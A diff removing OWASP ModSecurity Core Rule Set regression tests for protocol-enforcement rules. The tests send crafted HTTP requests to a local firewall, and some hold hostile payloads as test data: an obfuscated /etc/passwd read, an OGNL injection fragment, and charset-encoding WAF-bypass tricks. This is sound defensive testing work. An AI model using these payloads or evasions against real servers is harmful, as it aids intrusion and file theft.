Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/0.8
output:
status: [403, 400]
- test_title: 920430-10
desc: HTTP protocol version is not allowed by policy (920430) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: JUNK/1.0
output:
status: [403, 400]
# log_contains: id "920430"

112
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml vendored
View file

@ -1,112 +0,0 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 920440.yaml
tests:
- test_title: 920440-1
desc: URL file extension is restricted by policy (920440) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: "300"
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /foo.bak
version: HTTP/1.1
output:
log_contains: id "920440"
- test_title: 920440-2
desc: URL file extension is restricted by policy (920440) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: "300"
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /foo.db
version: HTTP/1.1
output:
log_contains: id "920440"
- test_title: 920440-3
desc: URL file extension is restricted by policy (920440) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: "300"
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /foo.old
version: HTTP/1.1
output:
log_contains: id "920440"
- test_title: 920440-4
desc: URL file extension is restricted by policy (920440) - GH issue 1296
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: "300"
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /foo.bar.sql
version: HTTP/1.1
output:
log_contains: id "920440"
- test_title: 920440-5
desc: Redis dump file
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: "300"
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /dump.rdb
version: HTTP/1.1
output:
log_contains: id "920440"

124
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920450.yaml vendored
View file

@ -1,124 +0,0 @@
---
meta:
author: "csanders-git, karelorigin"
enabled: true
name: "920450.yaml"
description: "Description"
tests:
- test_title: 920450-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-range: "test"
output:
log_contains: "id \"920450\""
- test_title: 920450-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
If: "test"
output:
log_contains: "id \"920450\""
- test_title: 920450-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
lock-token: "test"
output:
log_contains: "id \"920450\""
- test_title: 920450-4
desc: HTTP header is restricted by policy (920450) from old modsec regressions, we no longer block proxy-connection in 3.0
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.1
output:
no_log_contains: id "920450"
- test_title: 920450-5
desc: HTTP header is restricted by policy (920450) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Lock-Token: <opaquelocktoken
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.1
output:
log_contains: id "920450"
- test_title: 920450-6
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Range: "test"
output:
no_log_contains: "id \"920450\""
- test_title: 920450-7
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/"
headers:
User-Agent: "OWASP ModSecurity Core Rule Set"
Host: "localhost"
Accept: text/html
Accept-Charset: UTF-8
output:
log_contains: "id \"920450\""
- test_title: 920450-8
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/"
headers:
User-Agent: "OWASP ModSecurity Core Rule Set"
Host: "localhost"
Accept: text/html
Content-Encoding: deflate
output:
log_contains: "id \"920450\""

73
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920460.yaml vendored
View file

@ -1,73 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920460.yaml"
description: "Description"
tests:
- test_title: 920460-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
uri: "/"
headers:
Host: "localhost"
Accept: "*/*"
Content-Length: 22
Content-Type: "application/x-www-form-urlencoded"
User-Agent: "ModSecurity CRS 3 Tests"
data: 'file=cat+/etc/\passw\d'
stop_magic: true
output:
log_contains: "id \"920460\""
- test_title: 920460-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?file=cat+/etc/pa\\ssw\\d"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920460\""
- test_title: 920460-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?file=\\c"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920460\""
- test_title: 920460-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?file=\\\\c"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920460\""
- test_title: 920460-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?file=\\\\\\c"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920460\""

199
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920470.yaml vendored
View file

@ -1,199 +0,0 @@
---
meta:
author: "lifeforms, Franziska Bühler"
enabled: true
name: "920470.yaml"
description: "Content-Type header format checks"
tests:
- test_title: 920470-1
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "%{(#nike='multipart/form-data').(#dm=@ognl"
Content-Length: 0
output:
log_contains: "id \"920470\""
- test_title: 920470-2
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'text/plain; charset="UTF-8"; garbage'
Content-Length: 0
output:
log_contains: "id \"920470\""
- test_title: 920470-3
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'text/plain; charset=/gar/bage'
Content-Length: 0
output:
no_log_contains: "id \"920470\""
- test_title: 920470-4
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
method: POST
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "text/plain"
Content-Length: 0
output:
no_log_contains: "id \"920470\""
- test_title: 920470-5
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
method: POST
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'text/plain; charset=UTF-8'
output:
no_log_contains: "id \"920470\""
- test_title: 920470-6
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
method: POST
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'text/plain; charset="UTF-8"'
Content-Length: 0
output:
no_log_contains: "id \"920470\""
- test_title: 920470-7
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
method: POST
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'multipart/form-data; boundary=----WebKitFormBoundary12345'
Content-Length: 0
output:
no_log_contains: "id \"920470\""
- test_title: 920470-8
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
method: POST
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'application/json'
Content-Length: 0
output:
no_log_contains: "id \"920470\""
- test_title: 920470-9
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
method: POST
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'multipart/form-data; boundary=----formdata-polyfill-0.40616634299_704013'
Content-Length: 0
output:
no_log_contains: "id \"920470\""
- test_title: 920470-10
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
method: POST
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'multipart/mixed; boundary=-----boundary_data:55780(123,45:667)+part'
Content-Length: 0
output:
no_log_contains: "id \"920470\""
- test_title: 920470-11
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
method: POST
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'multipart/mixed; boundary= gc0p4Jq0M2Yt,08/jU534c0p?==:test'
Content-Length: 0
output:
no_log_contains: "id \"920470\""
- test_title: 920470-12
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
method: POST
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'multipart/form-data; boundary= test_data_123456'
Content-Length: 0
output:
log_contains: "id \"920470\""
- test_title: 920470-13
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
method: POST
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'multipart/related; type="application/xop+xml"; boundary="uuid:a111aaa1-aa11-1a11-a11a-11a1111aa11a"; start="<root.message@cxf.apache.org>"; start-info="application/soap+xml'
Content-Length: 0
output:
no_log_contains: "id \"920470\""
- test_title: 920470-14
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
method: POST
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'application/soap+xml; action="urn:hl7-org:v3:PRPA_IN201305UV02"; charset=UTF-8'
Content-Length: 0
output:
no_log_contains: "id \"920470\""

240
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml vendored
View file

@ -1,240 +0,0 @@
---
meta:
author: "lifeforms"
enabled: true
name: "920480.yaml"
description: "Description"
tests:
- test_title: 920480-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded; charset=utf-8"
data: "test=value"
output:
no_log_contains: "id \"920480\""
- test_title: 920480-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded;charset=UTF-8"
data: "test=value"
output:
no_log_contains: "id \"920480\""
- test_title: 920480-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded;charset=iso-8859-1"
data: "test=value"
output:
no_log_contains: "id \"920480\""
- test_title: 920480-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded;charset=ISO-8859-15"
data: "test=value"
output:
no_log_contains: "id \"920480\""
- test_title: 920480-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded; charset=windows-1252"
data: "test=value"
output:
no_log_contains: "id \"920480\""
# TODO: this case is not yet handled by 3.1, future work
# - test_title: 920480-6
# stages:
# - stage:
# input:
# dest_addr: "127.0.0.1"
# port: 80
# method: "POST"
# headers:
# User-Agent: "ModSecurity CRS 3 Tests"
# Host: "localhost"
# Content-Type: "application/x-www-form-urlencoded; charset=UTF-80" #trailing garbage after 'UTF-8'
# data: "test=value"
# output:
# log_contains: "id \"920480\""
- test_title: 920480-7
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded; charset=garbage"
data: "test=value"
output:
log_contains: "id \"920480\""
- test_title: 920480-8
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded;charset=garbage"
data: "test=value"
output:
log_contains: "id \"920480\""
# TODO: this test should pass (works with curl), to be researched
# - test_title: 920480-9
# stages:
# - stage:
# input:
# dest_addr: "127.0.0.1"
# port: 80
# method: "POST"
# headers:
# User-Agent: "ModSecurity CRS 3 Tests"
# Host: "localhost"
# Content-Type: "application/x-www-form-urlencoded; charset=ibm037" # https://www.slideshare.net/SoroushDalili/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour slide 32
# data: "test=value"
# output:
# log_contains: "id \"920480\""
# TODO: this test should pass (works with curl), to be researched
# - test_title: 920480-10
# stages:
# - stage:
# input:
# dest_addr: "127.0.0.1"
# port: 80
# method: "POST"
# headers:
# User-Agent: "ModSecurity CRS 3 Tests"
# Host: "localhost"
# Content-Type: "application/x-www-form-urlencoded;charset=ibm037" # https://www.slideshare.net/SoroushDalili/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour slide 32
# data: "test=value"
# output:
# log_contains: "id \"920480\""
- test_title: 920480-11
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
# random other IBM charset
Content-Type: "application/x-www-form-urlencoded;charset=ibm038"
data: "test=value"
output:
log_contains: "id \"920480\""
# TODO: this case is not yet checked by CRS, future work
# - test_title: 920480-12
# stages:
# - stage:
# input:
# dest_addr: "127.0.0.1"
# port: 80
# method: "POST"
# headers:
# User-Agent: "ModSecurity CRS 3 Tests"
# Host: "localhost"
# Content-Type: "application/x-www-form-urlencoded;charset=utf-8;charset=ibm037" #double charset may cause evasion
# data: "test=value"
# output:
# log_contains: "id \"920480\""
# TODO: this case is not yet checked by CRS, future work
# - test_title: 920480-13
# stages:
# - stage:
# input:
# dest_addr: "127.0.0.1"
# port: 80
# method: "POST"
# headers:
# User-Agent: "ModSecurity CRS 3 Tests"
# Host: "localhost"
# Content-Type: "application/x-www-form-urlencoded;charset=ibm037;charset=UTF-8" #double charset may cause evasion
# data: "test=value"
# output:
# log_contains: "id \"920480\""
- test_title: 920480-14
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
# random other IBM charset
Content-Type: "application/x-www-form-urlencoded; charset=\"utf-8\""
data: "test=value"
output:
no_log_contains: "id \"920480\""
- test_title: 920480-15
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
# random other IBM charset
Content-Type: "application/x-www-form-urlencoded; charset='utf-8'"
data: "test=value"
output:
no_log_contains: "id \"920480\""
- test_title: 920480-16
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
# random other IBM charset
Content-Type: "application/x-www-form-urlencoded; charset=\"garbage\""
data: "test=value"
output:
log_contains: "id \"920480\""

51
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920490.yaml vendored
View file

@ -1,51 +0,0 @@
---
meta:
author: "Christian Folini"
enabled: true
name: "920490.yaml"
description: "Tests for the charset protection in combination with the x-up-devcap-post-charset header"
tests:
- test_title: 920490-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "UP ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded; charset=utf-8"
x-up-devcap-post-charset: "ibm500"
data: "%89%95%97%A4%A3%F1=%A7%A7%A7%A7%A7%A7%A7"
output:
log_contains: "id \"920490\""
- test_title: 920490-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded; charset=utf-8"
x-up-devcap-post-charset: "ibm500"
data: "%89%95%97%A4%A3%F1=%A7%A7%A7%A7%A7%A7%A7"
output:
no_log_contains: "id \"920490\""
- test_title: 920490-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "UP ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded; charset=utf-8"
data: "%89%95%97%A4%A3%F1=%A7%A7%A7%A7%A7%A7%A7"
output:
no_log_contains: "id \"920490\""

49
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920500.yaml vendored
View file

@ -1,49 +0,0 @@
---
meta:
author: "Andrea Menin"
enabled: true
name: "920500.yaml"
description: "Tests for backup or working file extensions"
tests:
- test_title: 920500-1
desc: "Check request filename ends with ~"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "GET"
uri: "/index.php~"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920500\""
- test_title: 920500-2
desc: "Check request filename contains file that ends with ~ but not at end of string (bypass)"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "GET"
uri: "/index.php~/foo/bar/"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920500\""
- test_title: 920500-3
desc: "Rules 920500 should not block user dir such as /~user/"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "GET"
uri: "/~user/"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920500\""

97
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920510.yaml vendored
View file

@ -1,97 +0,0 @@
---
meta:
author: "Andrea Menin"
enabled: true
name: "920510.yaml"
description: "Cache-Control directives whitelist"
tests:
- test_title: 920510-1
desc: "block request with a response cache-control directive in request"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "GET"
uri: "/"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Cache-Control: "private"
output:
log_contains: "id \"920510\""
- test_title: 920510-2
desc: "block request with an invalid cache-control directive in request"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "GET"
uri: "/"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Cache-Control: "foo=bar"
output:
log_contains: "id \"920510\""
- test_title: 920510-3
desc: "block request with an invalid cache-control directive in request with multiple directives"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "GET"
uri: "/"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Cache-Control: "max-age=1, foo=bar"
output:
log_contains: "id \"920510\""
- test_title: 920510-4
desc: "block request with an invalid cache-control syntax in request with multiple directives"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "GET"
uri: "/"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Cache-Control: "max-age=1,,,max-stale=2"
output:
log_contains: "id \"920510\""
- test_title: 920510-5
desc: "allow request with valid cache-control single directive"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "GET"
uri: "/"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Cache-Control: "no-cache"
output:
no_log_contains: "id \"920510\""
- test_title: 920510-6
desc: "allow request with valid cache-control multiple directive"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "GET"
uri: "/"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Cache-Control: "max-age=123, max-stale, no-cache"
output:
no_log_contains: "id \"920510\""

71
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920530.yaml vendored
View file

@ -1,71 +0,0 @@
---
meta:
author: "terjanq"
description: "Restrict multiple charsets inside the content type header"
enabled: true
name: "920530.yaml"
tests:
- test_title: 920530-1
desc: "A valid request with a single charset"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "OWASP ModSecurity Core Rule Set"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded; charset=utf-8"
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
data: "test=value"
output:
no_log_contains: "id \"920530\""
- test_title: 920530-2
desc: "Bypass attempt with two charsets"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "OWASP ModSecurity Core Rule Set"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded; charset=utf-8; charset=utf-7"
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
data: "test=value"
output:
log_contains: "id \"920530\""
- test_title: 920530-3
desc: "Bypass attempt with hiding the charset inside a field"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "OWASP ModSecurity Core Rule Set"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded; charset=utf-8; boundary=\"charset=utf-7\""
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
data: "test=value"
output:
log_contains: "id \"920530\""
- test_title: 920530-4
desc: "Bypass attempt with uppercase CHARSET"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "OWASP ModSecurity Core Rule Set"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded; charset=utf-8; CHARSET=utf-7"
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
data: "test=value"
output:
log_contains: "id \"920530\""

150
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920600.yaml vendored
View file

@ -1,150 +0,0 @@
---
meta:
author: "karelorigin"
enabled: true
name: "920600.yaml"
description: "Accept header charset checks"
tests:
- test_title: 920600-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/"
headers:
User-Agent: "OWASP ModSecurity Core Rule Set"
Host: "localhost"
Accept: text/html;q=0.9;charset=CP1026,*/*;q=0.8
output:
log_contains: "id \"920600\""
- test_title: 920600-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/"
headers:
User-Agent: "OWASP ModSecurity Core Rule Set"
Host: "localhost"
Accept: text/html;q=0.9;charset="CP1026",*/*;q=0.8
output:
log_contains: "id \"920600\""
- test_title: 920600-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/"
headers:
User-Agent: "OWASP ModSecurity Core Rule Set"
Host: "localhost"
Accept: text/html;q=0.9;charset=UTF-8,*/*;q=0.8
output:
no_log_contains: "id \"920600\""
- test_title: 920600-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/"
headers:
User-Agent: "OWASP ModSecurity Core Rule Set"
Host: "localhost"
Accept: text/html;q=0.9;charset="UTF-8",*/*;q=0.8
output:
no_log_contains: "id \"920600\""
- test_title: 920600-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/"
headers:
User-Agent: "OWASP ModSecurity Core Rule Set"
Host: "localhost"
Accept: text/html;q=0.9;charset="iso-8859-1",*/*;q=0.8
output:
no_log_contains: "id \"920600\""
- test_title: 920600-6
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/"
headers:
User-Agent: "OWASP ModSecurity Core Rule Set"
Host: "localhost"
Accept: text/html;q=0.9;charset="iso-8859-1",*/*;q=0.8;charset=utf-16
output:
log_contains: "id \"920600\""
- test_title: 920600-7
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/"
headers:
User-Agent: "OWASP ModSecurity Core Rule Set"
Host: "localhost"
Accept: text/html;q=0.9;charset="iso-8859-1",*/*;q=0.8;charset=utf-8
output:
no_log_contains: "id \"920600\""
- test_title: 920600-8
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/"
headers:
User-Agent: "OWASP ModSecurity Core Rule Set"
Host: "localhost"
Accept: text/html;q=0.9;charset="iso-8859-15",*/*;q=0.8
output:
no_log_contains: "id \"920600\""
- test_title: 920600-9
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/"
headers:
User-Agent: "OWASP ModSecurity Core Rule Set"
Host: "localhost"
Accept: text/html;q=0.9;charset="windows-1252",*/*;q=0.8
output:
no_log_contains: "id \"920600\""
- test_title: 920600-10
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/"
headers:
User-Agent: "OWASP ModSecurity Core Rule Set"
Host: "localhost"
Accept: text/html;q=0.9;charset="windows-1252",*/*;q=0.8;
output:
no_log_contains: "id \"920600\""
- test_title: 920600-11
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/"
headers:
User-Agent: "OWASP ModSecurity Core Rule Set"
Host: "localhost"
Accept: text/html;q=0.9;charset="windows-1252";,*/*;q=0.8
output:
no_log_contains: "id \"920600\""

17
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920620.yaml vendored
View file

@ -1,17 +0,0 @@
---
meta:
author: "Andrea (theMiddle) Menin"
enabled: false
name: "920620.yaml"
description: "Tests for 920620"
tests:
- test_title: 920620-1
desc: Multiple Content-Type request headers
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
